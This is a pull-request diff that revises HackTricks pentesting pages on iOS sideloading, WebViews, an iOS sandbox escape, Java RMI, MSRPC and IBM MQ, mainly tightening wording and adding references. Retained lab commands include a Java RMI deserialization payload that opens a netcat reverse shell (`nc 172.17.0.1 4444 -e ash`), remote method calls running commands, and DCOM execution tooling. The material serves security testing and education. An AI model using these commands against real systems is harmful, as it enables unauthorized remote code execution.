### PR TITLE
Audit references across 50 HackTricks pages

### DIFF
--- a/src/mobile-pentesting/ios-pentesting/ios-pentesting-without-jailbreak.md
+++ b/src/mobile-pentesting/ios-pentesting/ios-pentesting-without-jailbreak.md
@@ -5,22 +5,22 @@
 
 ## Main idea
 
-Applications signed with the **entitlement `get_task_allow`** allow third party applications to run a function called **`task_for_pid()`** with the process ID of the initial application as argument in order to get the task port over it (be able to control it and access its memory).
+Applications signed with the **`get-task-allow` entitlement** permit an appropriately entitled debugger to call **`task_for_pid()`** with the application's process ID and obtain its task port, which enables debugging and memory access.<sup>[[10]](#references)</sup>
 
-However, it’s not as easy as just pulling the IPA, re-signing it with the entitlement, and flashing it back to your device. This is because of FairPlay protection. When the signature of the app changes, the DRM (Digital Rights Management) key is **invalidated and the app won't work**.
+However, it is not as easy as pulling the IPA, re-signing it with the entitlement, and installing it on your device. FairPlay protects App Store applications, and changing the signature invalidates the DRM key, so the encrypted application will not run.<sup>[[1]](#references)</sup>
 
-With an old jailbroken device, it's possible to install the IPA, **decrypt it using your favourite tool** (such as Iridium or frida-ios-dump), and pull it back off the device. Although, if possible, it's recommended to just ask the client for the decrypted IPA.
+With an old jailbroken device, it is possible to install the IPA, **decrypt it with a tool** such as Iridium or `frida-ios-dump`, and pull it back off the device. When possible, ask the client for a decrypted IPA instead.
 
 ## Obtain decrypted IPA
 
-### Get it from Apple
+### Get it from Apple<sup>[[1]](#references)</sup>
 
-1. Install the app to pentest in the iPhone
-2. Install and launch [Apple Configurator](https://apps.apple.com/au/app/apple-configurator/id1037126344?mt=12) inside your macos
-3. Open `Terminal `on your Mac, and cd to `/Users/[username]/Library/Group\\ Containers/K36BKF7T3D.group.com.apple.configurator/Library/Caches/Assets/TemporaryItems/MobileApps`. The IPA will appear in this folder later.
+1. Install the app to test on the iPhone.
+2. Install and launch [Apple Configurator](https://apps.apple.com/au/app/apple-configurator/id1037126344?mt=12) on macOS.
+3. Open Terminal on the Mac and change to `/Users/[username]/Library/Group\\ Containers/K36BKF7T3D.group.com.apple.configurator/Library/Caches/Assets/TemporaryItems/MobileApps`. The IPA will appear in this folder later.
 4. You should see your iOS device. Double-click on it, and then click Add + → Apps from the top menu bar.
 5. After clicking Add, Configurator will download the IPA from Apple, and attempt to push it to your device. If you followed my recommendation earlier and installed the IPA already, a prompt asking you to reinstall the app will appear.
-6. The IPA should be downloaded inside `/Users/[username]/Library/Group\\ Containers/K36BKF7T3D.group.com.apple.configurator/Library/Caches/Assets/TemporaryItems/MobileApps`from where you can grab it
+6. Retrieve the downloaded IPA from `/Users/[username]/Library/Group\\ Containers/K36BKF7T3D.group.com.apple.configurator/Library/Caches/Assets/TemporaryItems/MobileApps`.
 
 Check [https://dvuln.com/blog/modern-ios-pentesting-no-jailbreak-needed](https://dvuln.com/blog/modern-ios-pentesting-no-jailbreak-needed) for more detailed information about this process.<sup>[[1]](#references)</sup>
 
@@ -55,9 +55,9 @@ Once installed, you can use **Iridium tweak** from Cydia in order to obtain the 
 
 ### Patch entitlements & re-sign
 
-In order to re-sign the application with the `get-task-allow` entitlement there are several tools available like `app-signer`, `codesign`, and `iResign`. `app-signer` has a very user-friendly interface that allows to very easily re-sign an IPA file indicating the IPA to re-sign, to **enable `get-task-allow`** and the certificate and provisioning profile to use.
+Several tools can re-sign the application with the `get-task-allow` entitlement, including `app-signer`, `codesign`, and `iResign`. The `app-signer` interface lets you select the IPA, **enable `get-task-allow`**, and choose the certificate and provisioning profile.
 
-Regarding the certificate and signing profiles, Apple offers **free developer signing profiles** for all accounts through Xcode. Just create an app and configure one. Then, configure the **iPhone to trust the developer apps** by navigating to `Settings` → `Privacy & Security`, and click on `Developer Mode`.
+Apple offers **free developer signing profiles** through Xcode. Create an app to configure a profile, and enable **Developer Mode** on the iPhone under `Settings` → `Privacy & Security`.
 
 With the re-signed IPA, it's time to install it in the device to pentest it:
 
@@ -92,7 +92,7 @@ python3 tools/patcher.py full \
 
 Notes:
 
-- Free Apple ID signing usually expires in **7 days** and is limited to **3 App IDs/week** and **10 sideloaded apps**.
+- Free Apple ID signing usually expires in **7 days** and is limited to **3 App IDs per week** and **10 sideloaded apps**.<sup>[[9]](#references)</sup>
 - The tool can re-sign cross-platform by authenticating with Apple via **SRP** and generating a free dev certificate + provisioning profile. Apple’s **anisette** headers are handled per platform (macOS via `AOSKit.framework`, Linux via Anisette.py, Windows via an external anisette server).
 - This **does not** bypass the sandbox. The injected code runs inside the app process and can only access the app’s sandbox and keychain access groups.
 
@@ -135,7 +135,7 @@ There are now several mature ways to sideload and keep re-signed IPAs up-to-date
 | Tool | Requirements | Strengths | Limitations |
 |------|--------------|-----------|-------------|
 | **AltStore 2 / SideStore** | Free Apple ID + companion workflow (`AltServer`) or the on-device SideStore flow | Familiar UX, automatic refresh, practical on current devices | Free profiles still expire after **7 days**; free Apple IDs are usually limited to **3 installed apps** and roughly **10 App IDs** in a **7-day** window<sup>[[9]](#references)</sup> |
-| **TrollStore 1/2** | Device on a firmware officially supported by the CoreTrust bug (**14.0 beta 2 – 16.6.1**, **16.7 RC (20H18)**, and **17.0**) | *Permanent* signing (no 7-day refresh); excellent for long assessments on vulnerable devices | Firmware-specific; **17.0.1+** and most fully patched modern releases are out of scope unless a new CoreTrust bug appears |
+| **TrollStore 1/2** | Device on firmware officially supported by the CoreTrust bug (**14.0 beta 2 – 16.6.1**, **16.7 RC (20H18)**, and **17.0**) | *Permanent* signing (no 7-day refresh); excellent for long assessments on vulnerable devices | Firmware-specific; **17.0.1+** and most fully patched modern releases are out of scope unless a new CoreTrust bug appears<sup>[[11]](#references)</sup> |
 
 For routine pentests on current iOS versions AltStore/SideStore are usually the most practical choice, while TrollStore is the best option when the target test device happens to be on a compatible firmware.
 
@@ -304,5 +304,7 @@ MobSF will automatically deploy the binary, enable a Frida server inside the app
 - [7] [pymobiledevice3 – iOS 17+ Developer Services via Tunnel](https://github.com/doronz88/pymobiledevice3/blob/master/docs/guides/ios17-tunnels.md)
 - [8] [go-ios](https://github.com/danielpaulus/go-ios)
 - [9] [SideStore FAQ](https://docs.sidestore.io/docs/faq)
+- [10] [Apple Developer Documentation – Debugging tool entitlement](https://developer.apple.com/documentation/bundleresources/entitlements/com.apple.security.cs.debugger)
+- [11] [TrollStore – Supported versions and CoreTrust behavior](https://github.com/opa334/TrollStore)
 
 {{#include ../../banners/hacktricks-training.md}}

--- a/src/mobile-pentesting/ios-pentesting/ios-webviews.md
+++ b/src/mobile-pentesting/ios-pentesting/ios-webviews.md
@@ -4,7 +4,7 @@
 
 The code of this page was extracted from [here](https://github.com/chame1eon/owasp-mstg/blob/master/Document/0x06h-Testing-Platform-Interaction.md). Check the page for further details.<sup>[[4]](#references)</sup>
 
-## WebViews types
+## WebView types
 
 WebViews are utilized within applications to display web content interactively. Various types of WebViews offer different functionalities and security features for iOS applications. Here's a brief overview:<sup>[[4]](#references)</sup>
 
@@ -71,7 +71,7 @@ $ rabin2 -zz ./WheresMyBrowser | grep -i "hasonlysecurecontent"
 
 Dynamic analysis involves inspecting the heap for WebView instances and their properties. A script named `webviews_inspector.js` is used for this purpose, targeting `UIWebView`, `WKWebView`, and `SFSafariViewController` instances. It logs information about found instances, including URLs and settings related to JavaScript and secure content.<sup>[[4]](#references)</sup>
 
-Heap inspection can be conducted using `ObjC.choose()` to identify WebView instances and check `javaScriptEnabled` and `hasonlysecurecontent` properties.
+Heap inspection can be conducted using `ObjC.choose()` to identify WebView instances and check the `javaScriptEnabled` and `hasOnlySecureContent` properties.
 
 ```javascript:webviews_inspector.js
 ObjC.choose(ObjC.classes["UIWebView"], {
@@ -127,7 +127,7 @@ The script is executed with:
 frida -U com.authenticationfailure.WheresMyBrowser -l webviews_inspector.js
 ```
 
-**Key Outcomes**:
+**Key outcomes:**
 
 - Instances of WebViews are successfully located and inspected.
 - JavaScript enablement and secure content settings are verified.
@@ -203,11 +203,9 @@ xhr.open(
 xhr.send(null)
 ```
 
-## Native Methods Exposed Through WebViews
+## Native methods exposed through WebViews
 
-## Understanding WebView Native Interfaces in iOS
-
-From iOS 7 onwards, Apple provided APIs for **communication between JavaScript in a WebView and native** Swift or Objective-C objects. This integration is primarily facilitated through two methods:<sup>[[4]](#references)</sup>
+Since iOS 7, Apple has provided APIs for **communication between JavaScript in a WebView and native** Swift or Objective-C objects. This integration is primarily facilitated through two methods:<sup>[[4]](#references)</sup>
 
 - **JSContext**: A JavaScript function is automatically created when a Swift or Objective-C block is linked to an identifier within a `JSContext`. This allows for seamless integration and communication between JavaScript and native code.
 - **JSExport Protocol**: By inheriting the `JSExport` protocol, native properties, instance methods, and class methods can be exposed to JavaScript. This means any changes made in the JavaScript environment are mirrored in the native environment, and vice versa. However, it's essential to ensure that sensitive data is not exposed inadvertently through this method.
@@ -222,7 +220,7 @@ In Objective-C, the `JSContext` for a `UIWebView` can be retrieved with the foll
 
 ### Communication with `WKWebView`
 
-For `WKWebView`, direct access to `JSContext` is not available. Instead, message passing is utilized through the `postMessage` function, enabling JavaScript to native communication. Handlers for these messages are set up as follows, enabling JavaScript to interact with the native application securely:
+For `WKWebView`, direct access to `JSContext` is not available. Instead, message passing uses the `postMessage` function for JavaScript-to-native communication. Handlers for these messages are set up as follows:
 
 ```swift
 func enableJavaScriptBridge(_ enabled: Bool) {

--- a/src/mobile-pentesting/ios-pentesting/itunesstored-bookassetd-sandbox-escape.md
+++ b/src/mobile-pentesting/ios-pentesting/itunesstored-bookassetd-sandbox-escape.md
@@ -1,15 +1,15 @@
-# itunesstored & bookassetd Sandbox Escape
+# `itunesstored` and `bookassetd` Sandbox Escape
 
 {{#include ../../banners/hacktricks-training.md}}
 
 ## Overview
 
-Recent research shows that two pre-installed iOS daemons, **`itunesstored`** (downloads manager) and **`bookassetd`** (Books / iBooks asset manager), blindly trust user-writable SQLite metadata. By dropping crafted `downloads.28.sqlitedb` and `BLDatabaseManager.sqlite` files plus a minimal EPUB archive, an attacker who can write under `/var/mobile/Media/` can coerce these daemons into **arbitrary file writes across most `mobile`-owned paths inside `/private/var/`**. The primitives survive reboots and let you tamper with system group caches such as `systemgroup.com.apple.mobilegestaltcache` to spoof device properties or persist configuration.<sup>[[1]](#references)</sup>
+Recent research shows that two pre-installed iOS daemons, **`itunesstored`** (download manager) and **`bookassetd`** (Books/iBooks asset manager), blindly trust user-writable SQLite metadata. By dropping crafted `downloads.28.sqlitedb` and `BLDatabaseManager.sqlite` files plus a minimal EPUB archive, an attacker who can write under `/var/mobile/Media/` can coerce these daemons into **arbitrary file writes across most `mobile`-owned paths inside `/private/var/`**. The primitives survive reboots and let you tamper with system-group caches such as `systemgroup.com.apple.mobilegestaltcache` to spoof device properties or persist configuration.<sup>[[1]](#references)</sup>
 
-Key properties:
+Key properties:<sup>[[1]](#references)</sup>
 
 - Works on devices up to at least **iOS 26.2b1** (tested on iPhone 12 / iOS 26.0.1).
-- Writable targets include `SystemGroup` caches, `/private/var/mobile/Library/FairPlay`, `/private/var/mobile/Media`, and other `mobile` owned files. Writes to `root`-owned files fail.
+- Writable targets include `SystemGroup` caches, `/private/var/mobile/Library/FairPlay`, `/private/var/mobile/Media`, and other `mobile`-owned files. Writes to `root`-owned files fail.
 - Needs only AFC-level access (USB file copy) or any foothold that lets you replace the target SQLite DBs and upload payloads.
 
 ## Threat Model & Requirements

--- a/src/mobile-pentesting/ios-pentesting/zero-click-messaging-image-parser-chains.md
+++ b/src/mobile-pentesting/ios-pentesting/zero-click-messaging-image-parser-chains.md
@@ -50,7 +50,7 @@ On Apple clients, the handler that processes these linked-device control packets
 
 WhatsApp's later 2025 advisory for **CVE-2025-55179** shows the same design mistake in a different message family: incomplete validation of **rich response messages** could let one user trigger processing of media content from an arbitrary URL on another user's device.<sup>[[4]](#references)</sup> Treat that as a strong hint that the real attack surface is **every schema that carries remote media descriptors**, not only device-linking opcodes.
 
-When auditing current builds, grep protobufs / dispatch tables for card-like wrappers as well as linked-device actions:
+When auditing current builds, search protobufs and dispatch tables for card-like wrappers as well as linked-device actions:
 
 ```bash
 rg -n "rich_response|hero_image|preview_url|media_url|thumbnail_uri" protobufs/ decompiled/
@@ -141,7 +141,7 @@ Once an OOB write exists in the vendor parser, combining it with the WhatsApp au
 - **Protocol validation**: Enforce strict allow-lists for every linked-device action. Companion commands that request a fetch/render must prove device pairing (signing the payload) and the URL should match an allow-list or signed blob.
 - **Transport replay countermeasures**: Bind each action to a per-device key and reject packets whose sender key is unknown, even if the protobuf syntax is correct.
 - **Media pipeline restrictions**: High-level apps should only allow approved MIME types and explicitly reject RAW/DNG unless the feature is required.
-- **Parser fuzzing regression tests**: Keep a corpora of malformed RAW/DNG files and run them against RawCamera/vendor decoders after every update.
+- **Parser fuzzing regression tests**: Keep a corpus of malformed RAW/DNG files and run it against RawCamera/vendor decoders after every update.
 - **Crash triage automation**: Attach `DYLD_INSERT_LIBRARIES` sanitizers or MTE on fuzz devices to catch subtle OOB conditions before attackers do.
 
 ## References

--- a/src/network-services-pentesting/1099-pentesting-java-rmi.md
+++ b/src/network-services-pentesting/1099-pentesting-java-rmi.md
@@ -1,13 +1,15 @@
-# 1098/1099/1050 - Pentesting Java RMI - RMI-IIOP
+# 1099 (legacy 1098/1050) - Pentesting Java RMI and RMI-IIOP
 
 {{#include ../banners/hacktricks-training.md}}
 
 
 ## Basic Information
 
-_Java Remote Method Invocation_, or _Java RMI_, is an object oriented _RPC_ mechanism that allows an object located in one _Java virtual machine_ to call methods on an object located in another _Java virtual machine_. This enables developers to write distributed applications using an object-oriented paradigm. A short introduction to _Java RMI_ from an offensive perspective can be found in [this blackhat talk](https://youtu.be/t_aw1mDNhzI?t=202).
+_Java Remote Method Invocation_ (_Java RMI_) is an object-oriented RPC mechanism that lets code in one Java Virtual Machine invoke methods on a remote object in another JVM. A short introduction from an offensive perspective appears in [this Black Hat talk](https://youtu.be/t_aw1mDNhzI?t=202).<sup>[[6]](#references)</sup>
 
-**Default port:** 1090,1098,1099,1199,4443-4446,8999-9010,9999
+The RMI registry defaults to TCP **1099**. TCP 1098 was the historical default for `rmid` (RMI Activation), and 1050 is commonly associated with legacy CORBA naming/RMI-IIOP deployments. The other ports below are application conventions frequently worth checking, not Java RMI protocol defaults. RMI-IIOP was removed from Java SE 11, and RMI Activation/`rmid` was removed from JDK 17, though older runtimes and third-party application servers remain in scope.<sup>[[7]](#references)[[8]](#references)[[9]](#references)</sup>
+
+**Commonly observed ports:** 1090, 1098, 1099, 1199, 4443-4446, 8999-9010, and 9999.
 
 ```
 PORT      STATE SERVICE      VERSION
@@ -17,20 +19,20 @@ PORT      STATE SERVICE      VERSION
 40259/tcp open  ssl/java-rmi Java RMI
 ```
 
-Usually, only the default _Java RMI_ components (the _RMI Registry_ and the _Activation System_) are bound to common ports. The _remote objects_ that implement the actual _RMI_ application are usually bound to random ports as shown in the output above.
+The RMI registry is commonly bound to a known port. Application objects may share a configured server port or use an ephemeral port when exported with port `0`, as in the scan output above. On legacy Java versions, the Activation System may also be exposed on its configured port.
 
-_nmap_ has sometimes troubles identifying _SSL_ protected _RMI_ services. If you encounter an unknown ssl service on a common _RMI_ port, you should further investigate.
+Nmap may have trouble identifying TLS-protected RMI services. Investigate an unknown TLS service on a common RMI/application-management port with protocol-aware tooling.
 
 ## RMI Components
 
 To put it in simple terms, _Java RMI_ allows a developer to make a _Java object_ available on the network. This opens up a _TCP_ port where clients can connect and call methods on the corresponding object. Despite this sounds simple, there are several challenges that _Java RMI_ needs to solve:
 
-1. To dispatch a method call via _Java RMI_, clients need to know the IP address, the listening port, the implemented class or interface and the `ObjID` of the targeted object (the `ObjID` is a unique and random identifier that is created when the object is made available on the network. It is required because _Java RMI_ allows multiple objects to listen on the same _TCP_ port).
+1. To dispatch a method call, an RMI client needs a remote reference containing the endpoint and object identifier, plus compatible remote-interface/stub information. An `ObjID` identifies an exported object within an RMI runtime. Generated IDs are unique for their host/time scope but are not necessarily cryptographically random; registry, DGC, and legacy activator objects use well-known IDs.<sup>[[10]](#references)</sup>
 2. Remote clients may allocate resources on the server by invoking methods on the exposed object. The _Java virtual machine_ needs to track which of these resources are still in use and which of them can be garbage collected.
 
-The first challenge is solved by the _RMI registry_, which is basically a naming service for _Java RMI_. The _RMI registry_ itself is also an _RMI service_, but the implemented interface and the `ObjID` are fixed and known by all _RMI_ clients. This allows _RMI_ clients to consume the _RMI_ registry just by knowing the corresponding _TCP_ port.
+The first challenge is addressed by the _RMI registry_, a bootstrap naming service. The registry itself is an RMI service with a known interface and well-known `ObjID`, so a client can construct its initial registry reference from a host and port.<sup>[[7]](#references)</sup>
 
-When developers want to make their _Java objects_ available within the network, they usually bind them to an _RMI registry_. The _registry_ stores all information required to connect to the object (IP address, listening port, implemented class or interface and the `ObjID` value) and makes it available under a human readable name (the _bound name_). Clients that want to consume the _RMI service_ ask the _RMI registry_ for the corresponding _bound name_ and the registry returns all required information to connect. Thus, the situation is basically the same as with an ordinary _DNS_ service. The following listing shows a small example:
+Developers commonly bind exported objects to an RMI registry. The registry associates a human-readable bound name with a serialized remote reference/stub. That reference contains the transport endpoint and remote-object identity needed for calls, while the client still needs compatible interface/stub classes unless another mechanism supplies them. This is a bootstrap analogy to DNS, not a direct protocol equivalent. The following listing shows a small example:
 
 ```java
 import java.rmi.registry.Registry;
@@ -56,15 +58,15 @@ public class ExampleClient {
 }
 ```
 
-The second of the above mentioned challenges is solved by the _Distributed Garbage Collector_ (_DGC_). This is another _RMI service_ with a well known `ObjID` value and it is available on basically each _RMI endpoint_. When an _RMI client_ starts to use an _RMI service_, it sends an information to the _DGC_ that the corresponding _remote object_ is in use. The _DGC_ can then track the reference count and is able to cleanup unused objects.
+The second challenge is handled by the _Distributed Garbage Collector_ (_DGC_), an RMI service with a well-known `ObjID` on RMI server endpoints. Clients send `dirty` calls to obtain or renew leases for remote references and `clean` calls when references are no longer held; the server can then determine when an exported object is no longer remotely referenced.<sup>[[6]](#references)</sup>
 
-Together with the deprecated _Activation System_, these are the three default components of _Java RMI_:
+Historically, the three well-known components were:
 
 1. The _RMI Registry_ (`ObjID = 0`)
-2. The _Activation System_ (`ObjID = 1`)
+2. The _Activation System_ (`ObjID = 1`, removed from JDK 17)
 3. The _Distributed Garbage Collector_ (`ObjID = 2`)
 
-The default components of _Java RMI_ have been known attack vectors for quite some time and multiple vulnerabilities exist in outdated _Java_ versions. From an attacker perspective, these default components are interisting, because they implemented known classes / interfaces and it is easily possible to interact with them. This situation is different for custom _RMI services_. To call a method on a _remote object_, you need to know the corresponding method signature in advance. Without knowing an existing method signature, there is no way to communicate to a _RMI service_.
+These standard components have been attack vectors in outdated Java versions because their interfaces and wire operations are predictable. Custom RMI services require a compatible method hash/signature for a meaningful invocation; attackers may recover it from client code or guess it from response differences, as described below.
 
 ## RMI Enumeration
 
@@ -130,9 +132,9 @@ $ rmg enum 172.17.0.2 9010
 [+] 	  --> Client codebase enabled	 - Configuration Status: Non Default
 ```
 
-The output of the enumeration action is explained in more detail in the [documentation pages](https://github.com/qtc-de/remote-method-guesser/blob/master/docs/rmg/actions.md#enum-action) of the project. Depending on the outcome, you should try to verify identified vulnerabilities.<sup>[[5]](#references)</sup>
+The project's [enumeration documentation](https://github.com/qtc-de/remote-method-guesser/blob/master/docs/rmg/actions.md#enum-action) explains each probe. Tool labels are hypotheses based on response behavior; verify a reported vulnerability safely against the exact runtime and configuration.<sup>[[5]](#references)</sup>
 
-The `ObjID` values displayed by _remote-method-guesser_ can be used to determine the uptime of the service. This may allows to identify other vulnerabilities:
+For generated `ObjID` values, the embedded `UID` timestamp can estimate when that identifier/address space was created. It may correlate with service start or object export, but it is not a guaranteed JVM uptime measurement:
 
 ```
 $ rmg objid '[55ff5a5d:17e0501b054:-7ff8, -4004948013687638236]'
@@ -147,9 +149,9 @@ $ rmg objid '[55ff5a5d:17e0501b054:-7ff8, -4004948013687638236]'
 
 ## Bruteforcing Remote Methods
 
-Even when no vulnerabilities have been identified during enumeration, the available _RMI_ services could still expose dangerous functions. Furthermore, despite _RMI_ communication to _RMI_ default components is protected by deserialization filters, when talking to custom _RMI_ services, such filters are usually not in place. Knowing valid method signatures on _RMI_ services is therefore valuable.
+Even when enumeration finds no known vulnerability, custom RMI services may expose dangerous methods or deserialize attacker-controlled arguments. Modern JDKs include built-in filters for registry/DGC paths and support process-wide and per-export deserialization filters, but application objects are safe only when an effective filter and narrow parameter types are actually configured.<sup>[[11]](#references)</sup>
 
-Unfortunately, _Java RMI_ does not support enumerating methods on _remote objects_. That being said, it is possible to bruteforce method signatures with tools like [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser) or [rmiscout](https://github.com/BishopFox/rmiscout):<sup>[[2]](#references)[[4]](#references)</sup>
+Java RMI does not provide a general remote-reflection operation for enumerating an object's methods. It is nevertheless possible to brute-force candidate method hashes/signatures with tools such as [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser) or [rmiscout](https://github.com/BishopFox/rmiscout):<sup>[[2]](#references)[[4]](#references)</sup>
 
 ```
 $ rmg guess 172.17.0.2 9010
@@ -181,14 +183,14 @@ $ rmg guess 172.17.0.2 9010
 [+] 		--> String login(java.util.HashMap dummy1)
 ```
 
-Identified methods can be called like this:
+In an authorized lab, an identified method can be called like this. The command executes the remote application's own `execute` method; `rmg` does not make every discovered method a command-execution primitive:
 
 ```
 $ rmg call 172.17.0.2 9010 '"id"' --bound-name plain-server --signature "String execute(String dummy)" --plugin GenericPrint.jar
 [+] uid=0(root) gid=0(root) groups=0(root)
 ```
 
-Or you can perform deserialization attacks like this:
+If a non-primitive parameter is deserialized without an effective filter and a compatible gadget chain exists on the server classpath, test deserialization with a harmless canary before any command payload. The following is the original lab demonstration:
 
 ```
 $ rmg serial 172.17.0.2 9010 CommonsCollections6 'nc 172.17.0.1 4444 -e ash' --bound-name plain-server --signature "String execute(String dummy)"
@@ -310,5 +312,11 @@ Entry_1:
 - [3] [Method Guessing - remote-method-guesser docs](https://github.com/qtc-de/remote-method-guesser/blob/master/docs/rmg/method-guessing.md)
 - [4] [rmiscout](https://bishopfox.com/blog/rmiscout)
 - [5] [qtc-de/remote-method-guesser](https://github.com/qtc-de/remote-method-guesser/blob/master/docs/rmg/actions.md#enum-action)
+- [6] [Java Remote Method Invocation Specification](https://docs.oracle.com/en/java/javase/25/docs/specs/rmi/index.html)
+- [7] [Java RMI `Registry` API and default port](https://docs.oracle.com/en/java/javase/25/docs/api/java.rmi/java/rmi/registry/Registry.html)
+- [8] [JEP 320 – Removal of Java SE CORBA and RMI-IIOP](https://openjdk.org/jeps/320)
+- [9] [JEP 407 – Removal of RMI Activation](https://openjdk.org/jeps/407)
+- [10] [Java `ObjID` API and well-known object identifiers](https://docs.oracle.com/en/java/javase/17/docs/api/java.rmi/java/rmi/server/ObjID.html)
+- [11] [JEP 290 – Filter Incoming Serialization Data](https://openjdk.org/jeps/290)
 
 {{#include ../banners/hacktricks-training.md}}

--- a/src/network-services-pentesting/135-pentesting-msrpc.md
+++ b/src/network-services-pentesting/135-pentesting-msrpc.md
@@ -4,9 +4,9 @@
 
 ## Basic Information
 
-The Microsoft Remote Procedure Call (MSRPC) protocol, a client-server model enabling a program to request a service from a program located on another computer without understanding the network's specifics, was initially derived from open-source software and later developed and copyrighted by Microsoft.
+Microsoft Remote Procedure Call (MSRPC) is a client-server mechanism that lets a program invoke a procedure exposed by another process, locally or over a network, through generated stubs and runtime-selected transports.
 
-The RPC endpoint mapper can be accessed via TCP and UDP port 135, SMB on TCP 139 and 445 (with a null or authenticated session), and as a web service on TCP port 593.
+The RPC endpoint mapper commonly listens on TCP port 135 (and historically UDP 135). RPC interfaces can also use named pipes carried over SMB on TCP 139/445, dynamic TCP endpoints learned from the mapper, or RPC over HTTP on TCP 593.
 
 ```
 135/tcp   open     msrpc         Microsoft Windows RPC
@@ -52,7 +52,7 @@ All options except `tcp_dcerpc_auditor` are specifically designed for targeting 
 - **Description**: LSA Directory Services (DS) interface, used to enumerate domains and trust relationships.
 - **IFID**: 12345778-1234-abcd-ef00-0123456789ac
 - **Named Pipe**: `\pipe\samr`
-- **Description**: LSA SAMR interface, used to access public SAM database elements (e.g., usernames) and brute-force user passwords regardless of account lockout policy.
+- **Description**: SAMR interface, used to enumerate permitted SAM/domain information such as users, groups, aliases, and password policy. Password guessing through any interface can trigger the target's lockout policy; do not assume SAMR bypasses it.
 - **IFID**: 1ff70682-0a51-30e8-076d-740be8cee98b
 - **Named Pipe**: `\pipe\atsvc`
 - **Description**: Task scheduler, used to remotely execute commands.
@@ -61,7 +61,7 @@ All options except `tcp_dcerpc_auditor` are specifically designed for targeting 
 - **Description**: Remote registry service, used to access and modify the system registry.
 - **IFID**: 367abb81-9844-35f1-ad32-98f038001003
 - **Named Pipe**: `\pipe\svcctl`
-- **Description**: Service control manager and server services, used to remotely start and stop services and execute commands.
+- **Description**: Server Service interface, used for operations such as enumerating shares, sessions, connections, and server configuration subject to access checks.
 - **IFID**: 4b324fc8-1670-01d3-1278-5a47bf6ee188
 - **Named Pipe**: `\pipe\srvsvc`
 - **Description**: Service control manager and server services, used to remotely start and stop services and execute commands.
@@ -101,13 +101,13 @@ FILE_EXISTS_AND_IS_DIRECTORY
 
 ### Identifying IP addresses
 
-Using [https://github.com/mubix/IOXIDResolver](https://github.com/mubix/IOXIDResolver), comes from [Airbus research](https://www.cyber.airbus.com/the-oxid-resolver-part-1-remote-enumeration-of-network-interfaces-without-any-authentication/) is possible to abuse the _**ServerAlive2**_ method inside the _**IOXIDResolver**_ interface.<sup>[[6]](#references)</sup>
+The [IOXIDResolver](https://github.com/mubix/IOXIDResolver) tool, based on [Airbus research](https://www.cyber.airbus.com/the-oxid-resolver-part-1-remote-enumeration-of-network-interfaces-without-any-authentication/), calls the `ServerAlive2` method on the `IOXIDResolver` interface to enumerate network bindings without authentication.<sup>[[6]](#references)</sup>
 
 This method has been used to get interface information as **IPv6** address from the HTB box _APT_. See [here](https://0xdf.gitlab.io/2021/04/10/htb-apt.html) for 0xdf APT writeup, it includes an alternative method using rpcmap.py from [Impacket](https://github.com/SecureAuthCorp/impacket/) with _stringbinding_ (see above).<sup>[[9]](#references)</sup>
 
-### Executing a RCE with valid credentials
+### Executing commands with valid credentials
 
-It is possible to execute remote code on a machine, if the credentials of a valid user are available using [dcomexec.py](https://github.com/fortra/impacket/blob/master/examples/dcomexec.py) from impacket framework.<sup>[[7]](#references)</sup>
+When the supplied account has sufficient remote DCOM permissions, Impacket's [dcomexec.py](https://github.com/fortra/impacket/blob/master/examples/dcomexec.py) can execute commands through exposed DCOM objects.<sup>[[7]](#references)</sup>
 
 **Remember to try with the different objects available**
 
@@ -227,11 +227,11 @@ $ctx = New-Object Marshal.NdrContextHandle
 $client.EfsRpcOpenFileRaw([ref]$ctx, "\\\127.0.0.1\test", 0)
 ```
 
-Authentication (Kerberos / NTLM) and encryption levels (`PacketIntegrity`, `PacketPrivacy`, …) can be supplied directly via the `Connect-RpcClient` cmdlet – ideal for **bypassing Security Descriptors** that protect high-privilege named pipes.
+Authentication (Kerberos/NTLM) and protection levels (`PacketIntegrity`, `PacketPrivacy`, …) can be supplied through `Connect-RpcClient`. This lets you test the access granted to a particular identity; it does not bypass a correctly enforced security descriptor.
 
 ### Context-Aware RPC Fuzzing (MS-RPC-Fuzzer)
 
-Static interface knowledge is great, but what you really want is **coverage-guided fuzzing** that understands *context handles* and complex parameter chains.  The open-source **MS-RPC-Fuzzer** project automates exactly that workflow:
+Static interface knowledge is useful, but deeper state requires fuzzing that understands *context handles* and parameter dependencies. The open-source **MS-RPC-Fuzzer** project automates that state-aware workflow; it is not a substitute for instrumented code-coverage feedback:
 
 1. Enumerate every interface/procedure exported by the target binary (`Get-RpcServer`).
 2. Generate dynamic clients for each interface (`Format-RpcClient`).
@@ -249,9 +249,9 @@ Invoke-MSRPCFuzzer -Pipe "\\.\pipe\efsrpc" -Auth NTLM `
                    -OutDir .\results
 ```
 
-A single out-of-bounds write or unexpected exception will be surfaced immediately with the exact opnum + fuzzed payload that triggered it – perfect starting point for a stable proof-of-concept exploit.<sup>[[3]](#references)[[4]](#references)</sup>
+Unexpected faults are logged with the opnum and fuzzed payload, providing a reproducible starting point for root-cause analysis. A crash alone does not establish exploitability.<sup>[[3]](#references)[[4]](#references)</sup>
 
-> ⚠️  Many RPC services execute in processes running as **NT AUTHORITY\SYSTEM**.  Any memory-safety issue here usually translates to local privilege escalation or (when exposed over SMB/135) *remote code execution*.
+> ⚠️ Many RPC services execute in processes running as **NT AUTHORITY\SYSTEM**. A reachable memory-safety flaw can therefore have high impact, including denial of service and potentially local privilege escalation or remote code execution, but exploitability depends on the bug and mitigations.
 
 
 ## References

--- a/src/network-services-pentesting/1414-pentesting-ibmmq.md
+++ b/src/network-services-pentesting/1414-pentesting-ibmmq.md
@@ -4,32 +4,33 @@
 
 ## Basic information
 
-IBM MQ is an IBM technology to manage message queues. As other **message broker** technologies, it is dedicated to receive, store, process and classify information between producers and consumers.
+IBM MQ is messaging middleware built around queue managers, queues, topics, channels, and related objects. It receives, stores, and forwards messages between producing and consuming applications; business processing and classification are normally performed by the connected applications or configured routing components.<sup>[[3]](#references)</sup>
 
-By default, **it exposes IBM MQ TCP port 1414**.
-Sometimes, HTTP REST API can be exposed on port **9443**.
-Metrics (Prometheus) could also be accessed from TCP port **9157**.
+IBM MQ examples and developer images commonly expose a queue-manager listener on TCP **1414**, but listener ports are configurable. When `mqweb` is enabled, the Console and REST APIs commonly use HTTPS **9443**. The IBM MQ container's optional Prometheus metrics endpoint commonly uses TCP **9157**; this is not a universal queue-manager protocol port.<sup>[[3]](#references)[[7]](#references)</sup>
 
